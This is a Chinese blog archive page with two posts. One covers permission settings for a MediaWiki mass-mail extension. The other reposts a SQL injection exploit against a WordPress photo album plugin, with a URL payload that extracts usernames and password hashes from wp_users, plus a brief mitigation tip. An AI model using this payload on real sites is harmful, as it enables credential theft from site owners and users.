Archive

Posts Tagged ‘权限’

STSGMassMailer助Mediawiki邮件群发

May 23rd, 2008
No comments

STSGMassMailer是mediawiki的一个扩展插件,很感谢“漢武帝”让我认识啦他。

这个扩展功能的详细文档:http://www.mediawiki.org/wiki/Extension:STSGMassMailer

STGS MassMailer adds a special page called Mass E-mail which allows to send a mass emailing to all wiki users with valid email addresses. It also allows you to pick and choose which persons to send to, and you can even add extra email address that are not in your database. Since there is definite possibility of abuse, this special page is only available to users who have the delete access on the wiki (i.e. sysops or any other user defined group with privileges to do so).

stsgs massmailer在special page添加了个叫做Mass E-mail的页面,可以通过这个页面对所有通过邮箱验证的wiki用户群发邮件。也可以有选择的发送给选定的wiki用户,甚至可以添加不在数据库中的邮箱地址,为啦不至于群发被滥用,这个special page默认仅仅允许有删除(delete)权限的用户使用(sysops(系统管理员)组或者在privileges(操作员)组中的用户)。

如果想更改群发邮件的权限为高层限制级到普通注册用户级别,只需要修改

extensions/SpecialMassEmail.body.php中的代码:

if($wgUser->isAllowed("delete")) {
为(有两处这样的判断语句)
if($wgUser->isAllowed("edit")) {
然后在LocalSettings.php中添加,$wgGroupPermissions['*']['edit'] = false;防止匿名用户使用群发邮件

主要围绕的是否具有编辑权限来限制用户使用群发邮件。

安装方法还是去mediawiki看吧

Wiki支持, 今日一点 , ,

Wordpress Photo album Remote SQL Injection Vulnerability

February 18th, 2008
1 comment

EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOİT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0×7c,user_login,0×7c,user_pass,0×7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection# AUTHOR : S@BUN## HOME 1 : http://www.milw0rm.com/author/1334#
建议修改admin用户权限并建立一个不用于发文章的管理员用户或者直接进数据库修改admin为其他名字

wordpress支持, 漏洞 , , , , , ,